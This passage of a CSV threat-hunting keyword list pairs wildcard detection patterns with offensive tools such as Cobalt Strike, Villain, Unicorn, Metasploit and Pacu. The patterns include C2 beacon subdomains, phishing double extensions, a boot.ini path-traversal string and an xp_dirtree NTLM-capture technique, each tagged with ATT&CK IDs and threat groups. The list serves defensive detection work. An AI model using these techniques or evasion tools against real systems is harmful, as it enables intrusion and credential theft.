scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"*.static.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.status.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.store.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.striker.local*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*.support.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.torproject.org/*/download/tor/*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt shellcode hta*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
+"*.txt shellcode macro*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
+"*.txt shellcode ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
+"*.txt.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.txt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.unconstrained.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z"
+"*.videos.123456.*","offensive_tool_keyword","cobaltstrike","A script 
to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*.vpn.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.webmail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.wiki.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*.xls.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xls.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xlsx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.xp_dirtree *\*","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/#kali-installer-images*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/.aggressor.prop*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*/.cme/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
